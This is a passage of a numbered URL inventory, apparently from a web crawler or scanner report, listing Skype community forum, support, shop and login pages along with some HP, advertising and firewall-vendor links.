18.134. http://blogs.skype.com/zh-Hans/

18.135. http://blogs.skype.com/zh-Hant/

18.136. http://community.skype.com/

18.137. http://community.skype.com/lithium/forum/images/divider-gray-300.jpg

18.138. http://community.skype.com/t5/Accesorios-y-hardware/bd-p/es_hardware

18.139. http://community.skype.com/t5/Allgemeine-Diskussion/bd-p/de_general

18.140. http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

18.141. http://community.skype.com/t5/Ayuda-de-la-comunidad-para-todas/ct-p/es_platforms

18.142. http://community.skype.com/t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202

18.143. http://community.skype.com/t5/Call-quality/Cutoffs-after-latest-version-update-Compare-experiences/m-p/134042

18.144. http://community.skype.com/t5/Coffee-Corner/ADD-ME/m-p/134208

18.145. http://community.skype.com/t5/Coffee-Corner/Add-me/m-p/134218

18.146. http://community.skype.com/t5/Coffee-Corner/bd-p/Coffee_corner

18.147. http://community.skype.com/t5/Computer/ct-p/Computer

18.148. http://community.skype.com/t5/Deutsch/ct-p/de

18.149. http://community.skype.com/t5/Discusión-general/bd-p/es_general

18.150. http://community.skype.com/t5/Discussione-generale/bd-p/it_general

18.151. http://community.skype.com/t5/English/ct-p/English

18.152. http://community.skype.com/t5/English/ct-p/English

18.153. http://community.skype.com/t5/Español/ct-p/es

18.154. http://community.skype.com/t5/Facebook/ct-p/fb_en

18.155. http://community.skype.com/t5/Formas-de-pagamento-crédito/bd-p/pt_payment

18.156. http://community.skype.com/t5/Frequently-Asked/ct-p/Frequently_asked

18.157. http://community.skype.com/t5/Garage/Add-an-quot-Old-Emoticons-quot-option-please/m-p/133868

18.158. http://community.skype.com/t5/Garage/bd-p/Garage

18.159. http://community.skype.com/t5/General/ct-p/General_discussion

18.160. http://community.skype.com/t5/Hardware/Speaker-problem/m-p/134244

18.161. http://community.skype.com/t5/Italiano/ct-p/it

18.162. http://community.skype.com/t5/Language-learning/Do-you-want-to-talk-with-me/m-p/134138

18.163. http://community.skype.com/t5/Language-learning/bd-p/Languages

18.164. http://community.skype.com/t5/Le-matériel-Skype/bd-p/fr_hardware

18.165. http://community.skype.com/t5/Les-produits-et-services-Skype/bd-p/fr_products

18.166. http://community.skype.com/t5/Linux/Google-Chrome-OS/m-p/133556

18.167. http://community.skype.com/t5/Linux/bd-p/Linux

18.168. http://community.skype.com/t5/Mac/Multiple-Skype-phone-numbers-how-can-I-forward-calls-to-ONLY-one/m-p/133784

18.169. http://community.skype.com/t5/Mac/OS-X-LION-Skype-5-2-BIIIIIG-PROBLEMS-Be-aware/m-p/134122

18.170. http://community.skype.com/t5/Mac/bd-p/Mac

18.171. http://community.skype.com/t5/Mobile/ct-p/Mobile

18.172. http://community.skype.com/t5/My-Account/ct-p/Account

18.173. http://community.skype.com/t5/Other-devices/GE-31591/m-p/133990

18.174. http://community.skype.com/t5/Other-devices/bd-p/Mobile_other

18.175. http://community.skype.com/t5/Pagamenti-Fatture-Crediti/bd-p/it_payment

18.176. http://community.skype.com/t5/Payments-and-Billing/Account-blocked/m-p/132180

18.177. http://community.skype.com/t5/Payments-and-Billing/bd-p/Payments_and_Billing

18.178. http://community.skype.com/t5/Português/ct-p/pt

18.179. http://community.skype.com/t5/Public-API/Here-are-Workarounds-for-the-Skype4COM-Issues/m-p/133974

18.180. http://community.skype.com/t5/Public-API/bd-p/Public_API

18.181. http://community.skype.com/t5/Págos-Crédito-formas-de-pago/bd-p/es_payment

18.182. http://community.skype.com/t5/Security-Privacy-Trust-and/Account-blocked/m-p/133890

18.183. http://community.skype.com/t5/Security-Privacy-Trust-and/bd-p/Security_and_Privacy

18.184. http://community.skype.com/t5/Skype-5-3-Beta-for-Mac/How-to-change-langue/m-p/132756

18.185. http://community.skype.com/t5/Skype-5-3-Beta-for-Mac/bd-p/mac53

18.186. http://community.skype.com/t5/Skype-Community/bd-p/it_community

18.187. http://community.skype.com/t5/Skype-Connect/How-to-logout-from-facebook-account/m-p/133972

18.188. http://community.skype.com/t5/Skype-Connect/bd-p/Skype_Connect

18.189. http://community.skype.com/t5/Skype-Garage/ct-p/Skype_Garage

18.190. http://community.skype.com/t5/Skype-Manager/bd-p/Skype_Manager

18.191. http://community.skype.com/t5/Skype-Manager/deleting-an-older-account/m-p/133288

18.192. http://community.skype.com/t5/Skype-To-Go/Skype-to-Go-Numbers-always-busy/m-p/133620

18.193. http://community.skype.com/t5/Skype-To-Go/bd-p/Skype_To_Go

18.194. http://community.skype.com/t5/Skype-WiFi/Error-Message-quot-Cannot-connect-to-Skype-quot/m-p/132964

18.195. http://community.skype.com/t5/Skype-WiFi/bd-p/Skype_Access

18.196. http://community.skype.com/t5/Skype-auf-dem-Computer/ct-p/de_computer

18.197. http://community.skype.com/t5/Skype-for-Business/bd-p/pt_business

18.198. http://community.skype.com/t5/Skype-for-Business/ct-p/Business

18.199. http://community.skype.com/t5/Skype-für-Smartphones/bd-p/de_mobile_smartphones

18.200. http://community.skype.com/t5/Skype-on-your-TV/Need-to-know/m-p/134140

18.201. http://community.skype.com/t5/Skype-on-your-TV/bd-p/Skype_on_your_TV

18.202. http://community.skype.com/t5/Skype-на-компьютере/ct-p/ru_community

18.203. http://community.skype.com/t5/Skype-на-мобильных-устройствах/ct-p/ru_mobile

18.204. http://community.skype.com/t5/Subscriptions/Call-between-2-computers-on-the-same-account/m-p/129866

18.205. http://community.skype.com/t5/Subscriptions/Unlimited-world-subscription-not-working/m-p/134220

18.206. http://community.skype.com/t5/Subscriptions/bd-p/Subscriptions

18.207. http://community.skype.com/t5/Suporte-e-Ajuda-entre-a/ct-p/pt_platforms

18.208. http://community.skype.com/t5/Support-et-information/bd-p/fr_community

18.209. http://community.skype.com/t5/Supporto-Skype/bd-p/it_support

18.210. http://community.skype.com/t5/Symbian/bd-p/Symbian

18.211. http://community.skype.com/t5/Symbian/voice-call-nokia-c6/m-p/133740

18.212. http://community.skype.com/t5/Toolbars/My-skype-home-page-does-not-show-a-quot-search-for-users-option/m-p/132922

18.213. http://community.skype.com/t5/Toolbars/bd-p/Toolbars

18.214. http://community.skype.com/t5/Tópicos-Gerais/bd-p/pt_general

18.215. http://community.skype.com/t5/Welcome-Getting-Started/Welcome-to-the-Skype-Support-Network/m-p/24

18.216. http://community.skype.com/t5/Welcome-Getting-Started/bd-p/Welcome

18.217. http://community.skype.com/t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248

18.218. http://community.skype.com/t5/Windows/Api-access-control-wont-remember/m-p/134242

18.219. http://community.skype.com/t5/Windows/Creative-Live-inPerson-HD-Skype-5-5-x/m-p/134210

18.220. http://community.skype.com/t5/Windows/Creative-Live-inPerson-HD-Skype-5-5-x/m-p/134222

18.221. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/46260

18.222. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/47126

18.223. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/61276

18.224. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/64492

18.225. http://community.skype.com/t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510

18.226. http://community.skype.com/t5/Windows/How-to-mute-all-notifications-in-Skype-without-DO-NOT-DISTURB/m-p/87914

18.227. http://community.skype.com/t5/Windows/Install-says-Another-Version-Installed/m-p/134202

18.228. http://community.skype.com/t5/Windows/Install-says-Another-Version-Installed/m-p/134246

18.229. http://community.skype.com/t5/Windows/Skype-5-5-High-idle-CPU-usage/m-p/130106

18.230. http://community.skype.com/t5/Windows/Skype-5-5-shows-as-Skype-5-3-0-120-in-quot-About-Skype-quot/m-p/132300

18.231. http://community.skype.com/t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644

18.232. http://community.skype.com/t5/Windows/Skype-fails-to-log-me-in/m-p/132356

18.233. http://community.skype.com/t5/Windows/Update-Skype/m-p/132324

18.234. http://community.skype.com/t5/Windows/Windows-Beta-5-5-Suggestion/td-p/26642

18.235. http://community.skype.com/t5/Windows/Windows-Crashes-on-Skype-Startup-Login/m-p/134250

18.236. http://community.skype.com/t5/Windows/bd-p/Windows

18.237. http://community.skype.com/t5/Windows/bd-p/Windows/page/75

18.238. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028

18.239. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true

18.240. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/message-uid/24028/highlight/true

18.241. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032

18.242. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032/highlight/true

18.243. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032/message-uid/24032/highlight/true

18.244. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246

18.245. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/highlight/true

18.246. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740

18.247. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740/highlight/true

18.248. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740/message-uid/26740/highlight/true

18.249. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/td-p/24028

18.250. http://community.skype.com/t5/Windows/skype-not-doadloading-via-help-and-check-for-update-and-Facebook/m-p/130368

18.251. http://community.skype.com/t5/Zahlungen-Rechnungen-Skype/bd-p/de_payment

18.252. http://community.skype.com/t5/errors/error404page

18.253. http://community.skype.com/t5/forums/forumtopicpage.forummessageviewv2.quickreply.form.form.form

18.254. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/24028

18.255. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/24032

18.256. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/25246

18.257. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/26740

18.258. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1

18.259. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2922/print-single-message/true/page/1

18.260. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/3083/print-single-message/true/page/1

18.261. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/3272/print-single-message/true/page/1

18.262. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message

18.263. http://community.skype.com/t5/forums/searchpage.enableautocomplete:enableautocomplete

18.264. http://community.skype.com/t5/forums/searchpage.searchauthorfilter.form.form

18.265. http://community.skype.com/t5/forums/searchpage.searchcontent.messagesearchcontent.searchform.form.form

18.266. http://community.skype.com/t5/forums/searchpage/tab/message

18.267. http://community.skype.com/t5/forums/searchpage/tab/message

18.268. http://community.skype.com/t5/forums/searchpage/tab/user

18.269. http://community.skype.com/t5/forums/tagdetailpage/tag-cloud-grouping/tag/tag-cloud-style/frequent/message-scope/core-node/category-id/English/user-scope/all/tag-scope/all/timerange/all/tag-visibility-scope/public

18.270. http://community.skype.com/t5/forums/usersonlinepage

18.271. http://community.skype.com/t5/help/faqpage

18.272. http://community.skype.com/t5/help/faqpage/faq-category-id/advanced

18.273. http://community.skype.com/t5/help/faqpage/faq-category-id/blogs

18.274. http://community.skype.com/t5/help/faqpage/faq-category-id/catex

18.275. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas

18.276. http://community.skype.com/t5/help/faqpage/faq-category-id/images

18.277. http://community.skype.com/t5/help/faqpage/faq-category-id/images2

18.278. http://community.skype.com/t5/help/faqpage/faq-category-id/kudos

18.279. http://community.skype.com/t5/help/faqpage/faq-category-id/participation

18.280. http://community.skype.com/t5/help/faqpage/faq-category-id/personalization

18.281. http://community.skype.com/t5/help/faqpage/faq-category-id/pm

18.282. http://community.skype.com/t5/help/faqpage/faq-category-id/posting

18.283. http://community.skype.com/t5/help/faqpage/faq-category-id/qa

18.284. http://community.skype.com/t5/help/faqpage/faq-category-id/registration

18.285. http://community.skype.com/t5/help/faqpage/faq-category-id/search

18.286. http://community.skype.com/t5/help/faqpage/faq-category-id/solutions

18.287. http://community.skype.com/t5/help/faqpage/faq-category-id/tagging

18.288. http://community.skype.com/t5/help/faqpage/faq-category-id/video

18.289. http://community.skype.com/t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998

18.290. http://community.skype.com/t5/iPhone/bd-p/iPhone

18.291. http://community.skype.com/t5/tag/%20facebook/tg-p/category-id/English

18.292. http://community.skype.com/t5/tag/Android/tg-p/category-id/English

18.293. http://community.skype.com/t5/tag/Skype4COM/tg-p/category-id/English

18.294. http://community.skype.com/t5/tag/Sound/tg-p/category-id/English

18.295. http://community.skype.com/t5/tag/Video/tg-p/category-id/English

18.296. http://community.skype.com/t5/tag/audio/tg-p/category-id/English

18.297. http://community.skype.com/t5/tag/call/tg-p/category-id/English

18.298. http://community.skype.com/t5/tag/contacts/tg-p/category-id/English

18.299. http://community.skype.com/t5/tag/english/tg-p/category-id/English

18.300. http://community.skype.com/t5/tag/error/tg-p/category-id/English

18.301. http://community.skype.com/t5/tag/help/tg-p/category-id/English

18.302. http://community.skype.com/t5/tag/history/tg-p/category-id/English

18.303. http://community.skype.com/t5/tag/language/tg-p/category-id/English

18.304. http://community.skype.com/t5/tag/login/tg-p/category-id/English

18.305. http://community.skype.com/t5/tag/problem/tg-p/category-id/English

18.306. http://community.skype.com/t5/tag/refund/tg-p/category-id/English

18.307. http://community.skype.com/t5/tag/spanish/tg-p/category-id/English

18.308. http://community.skype.com/t5/tag/subscriptions/tg-p/category-id/English

18.309. http://community.skype.com/t5/tag/update/tg-p/category-id/English

18.310. http://community.skype.com/t5/tag/voicemail/tg-p/category-id/English

18.311. http://community.skype.com/t5/user/viewprofilepage/user-id/1164

18.312. http://community.skype.com/t5/user/viewprofilepage/user-id/148

18.313. http://community.skype.com/t5/user/viewprofilepage/user-id/165910

18.314. http://community.skype.com/t5/user/viewprofilepage/user-id/165928

18.315. http://community.skype.com/t5/user/viewprofilepage/user-id/165934

18.316. http://community.skype.com/t5/user/viewprofilepage/user-id/165942

18.317. http://community.skype.com/t5/user/viewprofilepage/user-id/165962

18.318. http://community.skype.com/t5/user/viewprofilepage/user-id/165964

18.319. http://community.skype.com/t5/Аккаунт-и-платежи/ct-p/ru_account

18.320. http://community.skype.com/t5/Дополнительный-раздел/ct-p/ru_general_board

18.321. http://community.skype.com/t5/???/ct-p/jp

18.322. http://fls.doubleclick.net/activityi

18.323. https://fls.doubleclick.net/activityi

18.324. http://googleads.g.doubleclick.net/pagead/ads

18.325. http://googleads.g.doubleclick.net/pagead/ads

18.326. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp

18.327. http://h17007.www1.hp.com/us/en/

18.328. http://h18004.www1.hp.com/products/blades/bladesystem/index.html

18.329. http://h20180.www2.hp.com/apps/Nav

18.330. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx

18.331. http://h30187.www3.hp.com/

18.332. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm

18.333. http://h30187.www3.hp.com/howto_QL_courses.jsp

18.334. http://h30187.www3.hp.com/index.jsp

18.335. http://h30261.www3.hp.com/phoenix.zhtml

18.336. http://h30434.www3.hp.com/

18.337. http://h30507.www3.hp.com/

18.338. https://h41183.www4.hp.com/inflexion/

18.339. http://heartbeat.skype.com/

18.340. http://heartbeat.skype.com/2011/08/paypal_payments_temporarily_un.html

18.341. https://login.skype.com/account/

18.342. https://login.skype.com/account/login-form

18.343. https://login.skype.com/account/password-automation

18.344. https://login.skype.com/account/password-reset-request

18.345. https://login.skype.com/account/password-token-sent

18.346. https://login.skype.com/account/signup-form

18.347. https://login.skype.com/go/shop

18.348. https://login.skype.com/go/shop.accessories.headsets

18.349. https://login.skype.com/go/shop.accessories.phones

18.350. https://login.skype.com/go/shop.accessories.webcams

18.351. https://login.skype.com/go/shop.extras

18.352. https://login.skype.com/go/skype.manager.setup

18.353. https://login.skype.com/go/tvwebcams

18.354. http://lwn.net/Articles/456878/

18.355. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/wallstreetoasis.com/ROS/1188128263@Right

18.356. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

18.357. http://s1.lqcdn.com/m.min.js

18.358. http://search.hp.com/query.html

18.359. http://shop.skype.com/

18.360. http://shop.skype.com/apps/

18.361. http://shop.skype.com/apps/Business/Clownfish-for-Skype.html

18.362. http://shop.skype.com/apps/Business/Zaplee-Phone-System-In-The-Cloud.html

18.363. http://shop.skype.com/apps/Business/index.html

18.364. http://shop.skype.com/apps/Call-recording-audio-only/CallBurner-MP3-Call-Recorder.html

18.365. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-Call-Recorder.html

18.366. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-for-Skype-Basic-Edition.html

18.367. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Basic-Version.html

18.368. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Professional-Version.html

18.369. http://shop.skype.com/apps/Call-recording-audio-only/index.html

18.370. http://shop.skype.com/apps/Call-recording-audio-video/Evaer-video-recorder-for-Skype.html

18.371. http://shop.skype.com/apps/Call-recording-audio-video/VodBurner-Video-Call-Recorder.html

18.372. http://shop.skype.com/apps/Call-recording-audio-video/index.html

18.373. http://shop.skype.com/apps/Desktop-whiteboard-sharing/IDroo.html

18.374. http://shop.skype.com/apps/Desktop-whiteboard-sharing/InnerPass-Screen-Sharing.html

18.375. http://shop.skype.com/apps/Desktop-whiteboard-sharing/index.html

18.376. http://shop.skype.com/apps/Faxing/PamFax-for-Mac-OS-X.html

18.377. http://shop.skype.com/apps/Faxing/PamFax-for-Windows.html

18.378. http://shop.skype.com/apps/Faxing/index.html

18.379. http://shop.skype.com/apps/Integrations-with-popular-software/Skylook-for-MS-Outlook.html

18.380. http://shop.skype.com/apps/Integrations-with-popular-software/index.html

18.381. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Android.html

18.382. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Apple.html

18.383. http://shop.skype.com/apps/Mobile-video-communications/index.html

18.384. http://shop.skype.com/apps/Search-Results.html

18.385. http://shop.skype.com/apps/index.html

18.386. http://shop.skype.com/go/shop

18.387. http://shop.skype.com/go/shop.accessories.headsets

18.388. http://shop.skype.com/go/shop.accessories.phones

18.389. http://shop.skype.com/go/shop.accessories.webcams

18.390. http://shop.skype.com/go/shop.extras

18.391. http://shop.skype.com/go/tvwebcams

18.392. http://shop.skype.com/intl/[LC]/

18.393. https://support.skype.com/de/

18.394. https://support.skype.com/en-us/

18.395. https://support.skype.com/en-us/category/ABOUT_SKYPE/

18.396. https://support.skype.com/en-us/category/AFFILIATE_PROGRAM/

18.397. https://support.skype.com/en-us/category/BANK_TRANSFERS/

18.398. https://support.skype.com/en-us/category/BIZ_VERSION/

18.399. https://support.skype.com/en-us/category/BLACKBERRY/

18.400. https://support.skype.com/en-us/category/BUYING_ACCESSORIES/

18.401. https://support.skype.com/en-us/category/CALLER_IDENTIFICATION/

18.402. https://support.skype.com/en-us/category/CALLING/

18.403. https://support.skype.com/en-us/category/CALLING_PHONES_SKYPEOUT/

18.404. https://support.skype.com/en-us/category/CALL_FORWARDING/

18.405. https://support.skype.com/en-us/category/CALL_QUALITY/

18.406. https://support.skype.com/en-us/category/CALL_TRANSFER/

18.407. https://support.skype.com/en-us/category/CONFERENCE_CALLING/

18.408. https://support.skype.com/en-us/category/CONNECTION_ISSUES/

18.409. https://support.skype.com/en-us/category/CONTACTS/

18.410. https://support.skype.com/en-us/category/CORDLESS_PHONES/

18.411. https://support.skype.com/en-us/category/CREDIT_CARDS/

18.412. https://support.skype.com/en-us/category/EXTRAS/

18.413. https://support.skype.com/en-us/category/FACEBOOK/

18.414. https://support.skype.com/en-us/category/FILE_TRANSFER/

18.415. https://support.skype.com/en-us/category/GIFT_CERTIFICATES/

18.416. https://support.skype.com/en-us/category/GIROPAY/

18.417. https://support.skype.com/en-us/category/GROUP_VIDEO_CALLING/

18.418. https://support.skype.com/en-us/category/INSTANT_MESSAGING_WITH_SKYPE/

18.419. https://support.skype.com/en-us/category/MONEYBOOKERS/

18.420. https://support.skype.com/en-us/category/MYSPACEIM_WITH_SKYPE/

18.421. https://support.skype.com/en-us/category/ONLINE_NUMBER_SKYPEIN/

18.422. https://support.skype.com/en-us/category/PAYMENT_PRICES/

18.423. https://support.skype.com/en-us/category/PAYPAL/

18.424. https://support.skype.com/en-us/category/PAYSAFECARD/

18.425. https://support.skype.com/en-us/category/PERSONALISE_SKYPE/

18.426. https://support.skype.com/en-us/category/PREPAID_CARDS/

18.427. https://support.skype.com/en-us/category/PRIVACY__SECURITY/

18.428. https://support.skype.com/en-us/category/PSP/

18.429. https://support.skype.com/en-us/category/PUBLIC_CHATS/

18.430. https://support.skype.com/en-us/category/SCREEN_SHARING/

18.431. https://support.skype.com/en-us/category/SC_CONFIG/

18.432. https://support.skype.com/en-us/category/SC_GETTING_STARTED/

18.433. https://support.skype.com/en-us/category/SC_PBX/

18.434. https://support.skype.com/en-us/category/SC_REQUIREMENTS/

18.435. https://support.skype.com/en-us/category/SC_TROUBLE/

18.436. https://support.skype.com/en-us/category/SEND_MONEY/

18.437. https://support.skype.com/en-us/category/SKYPEFIND/

18.438. https://support.skype.com/en-us/category/SKYPE_2_8_MAC_OR_BELOW/

18.439. https://support.skype.com/en-us/category/SKYPE_4_2_OR_BELOW/

18.440. https://support.skype.com/en-us/category/SKYPE_ACCESS/

18.441. https://support.skype.com/en-us/category/SKYPE_API/

18.442. https://support.skype.com/en-us/category/SKYPE_CALLS_FROM_BROWSERS/

18.443. https://support.skype.com/en-us/category/SKYPE_FOR_ANDROID/

18.444. https://support.skype.com/en-us/category/SKYPE_FOR_IPHONE/

18.445. https://support.skype.com/en-us/category/SKYPE_FOR_LINUX/

18.446. https://support.skype.com/en-us/category/SKYPE_FOR_MAC_OS_X/

18.447. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N800N810/

18.448. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N900/

18.449. https://support.skype.com/en-us/category/SKYPE_FOR_SYMBIAN/

18.450. https://support.skype.com/en-us/category/SKYPE_FOR_WEBOS/

18.451. https://support.skype.com/en-us/category/SKYPE_LITE/

18.452. https://support.skype.com/en-us/category/SKYPE_MANAGER_FOR_MEMBERS/

18.453. https://support.skype.com/en-us/category/SKYPE_ME/

18.454. https://support.skype.com/en-us/category/SKYPE_MOBILE_FOR_VERIZON/

18.455. https://support.skype.com/en-us/category/SKYPE_ON_AU/

18.456. https://support.skype.com/en-us/category/SKYPE_ON_TELUS/

18.457. https://support.skype.com/en-us/category/SKYPE_ON_THREE/

18.458. https://support.skype.com/en-us/category/SKYPE_ON_YOUR_TV/

18.459. https://support.skype.com/en-us/category/SKYPE_PRIME/

18.460. https://support.skype.com/en-us/category/SKYPE_PRO/

18.461. https://support.skype.com/en-us/category/SKYPE_SMS/

18.462. https://support.skype.com/en-us/category/SKYPE_TOOLBARS/

18.463. https://support.skype.com/en-us/category/SKYPE_TO_GO/

18.464. https://support.skype.com/en-us/category/SM_ACCOUNT_DETAILS/

18.465. https://support.skype.com/en-us/category/SM_FEATURES/

18.466. https://support.skype.com/en-us/category/SM_GETTING_STARTED/

18.467. https://support.skype.com/en-us/category/SM_MEMBERS/

18.468. https://support.skype.com/en-us/category/SM_PAYMENTS/

18.469. https://support.skype.com/en-us/category/SM_REPORTS/

18.470. https://support.skype.com/en-us/category/SUBSCRIPTIONS/

18.471. https://support.skype.com/en-us/category/TS_ACCOUNT/

18.472. https://support.skype.com/en-us/category/TS_INSTALL_UPGRADE/

18.473. https://support.skype.com/en-us/category/UKASH/

18.474. https://support.skype.com/en-us/category/VIDEO/

18.475. https://support.skype.com/en-us/category/VID_CALLING/

18.476. https://support.skype.com/en-us/category/VOICEMAIL/

18.477. https://support.skype.com/en-us/category/VOUCHERS/

18.478. https://support.skype.com/en-us/category/WINDOWS_MOBILE/

18.479. https://support.skype.com/en-us/category/YANDEX_MONEY/

18.480. https://support.skype.com/en-us/faq/FA10414/How-do-subscriptions-work

18.481. https://support.skype.com/en-us/faq/FA10416/Why-isn-t-my-subscription-working

18.482. https://support.skype.com/en-us/faq/FA109/I-ve-forgotten-my-password

18.483. https://support.skype.com/en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook

18.484. https://support.skype.com/en-us/faq/FA140/How-can-I-change-my-privacy-settings

18.485. https://support.skype.com/en-us/faq/FA331/What-is-an-Online-Number

18.486. https://support.skype.com/en-us/faq/FA351/How-can-I-pay-for-Skype-products

18.487. https://support.skype.com/en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype

18.488. https://support.skype.com/en-us/glossary

18.489. https://support.skype.com/en-us/search.form

18.490. https://support.skype.com/en-us/search_first/

18.491. https://support.skype.com/en/

18.492. https://support.skype.com/en/category/BANK_TRANSFERS/

18.493. https://support.skype.com/en/category/BIZ

18.494. https://support.skype.com/en/category/CALL

18.495. https://support.skype.com/en/category/CREDIT_CARDS/

18.496. https://support.skype.com/en/category/GIFT_CERTIFICATES/

18.497. https://support.skype.com/en/category/GIROPAY/

18.498. https://support.skype.com/en/category/MESSAGING

18.499. https://support.skype.com/en/category/MONEYBOOKERS/

18.500. https://support.skype.com/en/category/PAY

18.501. https://support.skype.com/en/category/PAYMENT_PRICES/

18.502. https://support.skype.com/en/category/PAYPAL/

18.503. https://support.skype.com/en/category/PAYSAFECARD/

18.504. https://support.skype.com/en/category/PREPAID_CARDS/

18.505. https://support.skype.com/en/category/PRIVACY__SECURITY/

18.506. https://support.skype.com/en/category/PROD

18.507. https://support.skype.com/en/category/SKYPE_FOR_YOUR_MOBILE

18.508. https://support.skype.com/en/category/SUBSCRIPTIONS/

18.509. https://support.skype.com/en/category/TECH

18.510. https://support.skype.com/en/category/TS_ACCOUNT/

18.511. https://support.skype.com/en/category/UKASH/

18.512. https://support.skype.com/en/category/VID_CALL

18.513. https://support.skype.com/en/category/VOUCHERS/

18.514. https://support.skype.com/en/category/YANDEX_MONEY/

18.515. https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account

18.516. https://support.skype.com/en/faq/FA10673/What-is-Skype-Home

18.517. https://support.skype.com/en/faq/FA109/I-ve-forgotten-my-password

18.518. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

18.519. https://support.skype.com/en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile

18.520. https://support.skype.com/en/faqFeedback.form

18.521. https://support.skype.com/en/glossary

18.522. https://support.skype.com/en/search

18.523. https://support.skype.com/en/search.form

18.524. https://support.skype.com/en/support_selection_after_search

18.525. https://support.skype.com/en/tips

18.526. https://support.skype.com/faqView.do

18.527. https://support.skype.com/homepage.do

18.528. https://support.skype.com/search.do

18.529. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php

18.530. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml

18.531. http://www.cymphonix.com/2011-shaping-demo-sem.html

18.532. http://www.facebook.com/plugins/fan.php

18.533. http://www.imperva.com/index.html

18.534. http://www.imperva.com/products/wsc_web-application-firewall.html

18.535. http://www.radware.com/

18.536. http://www.radware.com/Resources/AppWallSolution.aspx

18.537. http://www.radware.com/gag=2157798556&gclid=CLjykYz_g6sCFQwaQgodAQy8yw

18.538. http://www.skype.com/favicon.ico

18.539. http://www.skype.com/intl/[LC]/

18.540. http://www.skype.com/intl/_application/content/error_pages/404/

18.541. http://www.skype.com/intl/en-gb/campaigns/toolbar/

18.542. http://www.skype.com/intl/en-gb/legal/privacy/general/

18.543. http://www.skype.com/intl/en-us/business

18.544. http://www.skype.com/intl/en-us/business-user-guide/pc/

18.545. http://www.skype.com/intl/en-us/business/

18.546. http://www.skype.com/intl/en-us/business/download

18.547. http://www.skype.com/intl/en-us/business/download/

18.548. http://www.skype.com/intl/en-us/business/group-video

18.549. http://www.skype.com/intl/en-us/business/group-video/

18.550. http://www.skype.com/intl/en-us/business/skype-connect

18.551. http://www.skype.com/intl/en-us/business/skype-connect/

18.552. http://www.skype.com/intl/en-us/business/skype-manager

18.553. http://www.skype.com/intl/en-us/business/skype-manager/

18.554. http://www.skype.com/intl/en-us/campaigns/gvc/11q1_combined.html

18.555. http://www.skype.com/intl/en-us/features

18.556. http://www.skype.com/intl/en-us/features/

18.557. http://www.skype.com/intl/en-us/features/allfeatures/call-forwarding

18.558. http://www.skype.com/intl/en-us/features/allfeatures/call-forwarding/

18.559. http://www.skype.com/intl/en-us/features/allfeatures/call-phones-and-mobiles

18.560. http://www.skype.com/intl/en-us/features/allfeatures/call-phones-and-mobiles/

